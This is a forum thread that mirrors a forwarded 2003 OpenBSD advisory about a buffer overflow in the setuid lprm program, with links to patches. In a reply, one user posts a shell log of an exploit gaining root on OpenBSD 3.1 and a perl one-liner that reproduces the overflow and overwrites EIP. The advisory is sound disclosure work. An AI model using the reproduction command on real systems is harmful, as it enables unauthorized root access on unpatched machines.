Likes Likes:  0
Resultaten 1 tot 2 van de 2
Geen
  1. #1
    Dave Ahmad
    potential buffer overflow in lprm (fwd)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    potential buffer overflow in lprm (fwd)

    ---825423385-584089384-1046903605=:26977
    Content-Type: TEXT/PLAIN; charset=US-ASCII



    David Mirza Ahmad
    Symantec

    "sabbe dhamma anatta"

    0x26005712
    8D 9A B1 33 82 3D B3 D0 40 EB AB F0 1E 67 C6 1A 26 00 57 12

    ---825423385-584089384-1046903605=:26977
    Content-Type: MESSAGE/RFC822; CHARSET=US-ASCII
    Content-ID: <Pine.LNX.4.43.0303051533230.26977@mail.securityfo cus.com>
    Content-Description: potential buffer overflow in lprm (fwd)

    Return-Path: <owner-security-announce+M30=da=securityfocus.com@openbsd.org>
    Delivered-To: da@securityfocus.com
    Received: (qmail 32695 invoked from network); 5 Mar 2003 22:30:51 -0000
    Received: from openbsd.cs.colorado.edu (128.138.192.83)
    by mail.securityfocus.com with SMTP; 5 Mar 2003 22:30:51 -0000
    Received: from openbsd.org (localhost.cs.colorado.edu [127.0.0.1])
    by openbsd.cs.colorado.edu (8.12.7/8.12.5) with ESMTP id h25MRMEa018623
    for <da@securityfocus.com>; Wed, 5 Mar 2003 15:29:44 -0700 (MST)
    Received: from xerxes.courtesan.com (courtesan.com [206.168.103.86])
    by openbsd.cs.colorado.edu (8.12.8/8.12.5) with ESMTP id h25MQLZN029235
    (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL)
    for <security-announce@openbsd.org>; Wed, 5 Mar 2003 15:26:22 -0700 (MST)
    Received: from xerxes.courtesan.com (IDENT:millert@localhost.courtesan.com [127.0.0.1])
    by xerxes.courtesan.com (8.12.8/8.12.6) with ESMTP id h25MQMQs018799
    for <security-announce@openbsd.org>; Wed, 5 Mar 2003 15:26:22 -0700 (MST)
    Message-Id: <200303052226.h25MQMQs018799@xerxes.courtesan.co m>
    To: security-announce@openbsd.org
    Subject: potential buffer overflow in lprm
    Date: Wed, 05 Mar 2003 15:26:22 -0700
    From: "Todd C. Miller" <Todd.Miller@courtesan.com>
    X-Loop: security-announce@openbsd.org
    Precedence: list
    Sender: owner-security-announce@openbsd.org


    A bounds check that was added to lprm in 1996 does its checking too
    late to be effective. Because of the insufficient check, it may
    be possible for a local user to exploit lprm to gain elevated
    privileges. It is not know at this time whether or not the bug is
    actually exploitable.

    Starting with OpenBSD 3.2, lprm is setuid user daemon which limits
    the impact of the bug. OpenBSD 3.1 and below however, ship with
    lprm setuid root so this is a potential localhost root hole on older
    versions of OpenBSD.

    The bug is fixed in OpenBSD-current as well as the 3.2 and 3.1
    -stable branches.

    Patch for OpenBSD 3.1:
    ftp://ftp.openbsd.org/pub/OpenBSD/pa...023_lprm.patch

    Patch for OpenBSD 3.2:
    ftp://ftp.openbsd.org/pub/OpenBSD/pa...010_lprm.patch

    Thanks go to Arne Woerner for noticing this bug.

    ---825423385-584089384-1046903605=:26977--

  2. #2
    noir sin
    potential buffer overflow in lprm (fwd)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: potential buffer overflow in lprm (fwd)


    > A bounds check that was added to lprm in 1996 does its checking too
    > late to be effective. Because of the insufficient check, it may
    > be possible for a local user to exploit lprm to gain elevated
    > privileges. It is not know at this time whether or not the bug is
    > actually exploitable.


    a real funny stack overflow! if you got a valid printer setup its instant
    root!

    there is nothing "potential" about this, it is uid=0 ;pPp

    bash-2.05a$ id
    uid=1000(noir) gid=10(users) groups=10(users)
    bash-2.05a$ while `test .`; do ./lprm_ex; done
    lp: unknown printer
    Segmentation fault
    lp: unknown printer
    Segmentation fault
    lp: unknown printer
    Segmentation fault
    lp: unknown printer
    # id
    uid=1000(noir) euid=0(root) gid=10(users) egid=1(daemon) groups=10(users)
    # uname -a
    OpenBSD kernfu 3.1 conf#0 i386
    #


    to repro: lprm -Pvalid_printer_name `perl -e 'print "A"x512'` `perl -e
    'print "A"x518'`

    this shall get you eip = 0x41414141



Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics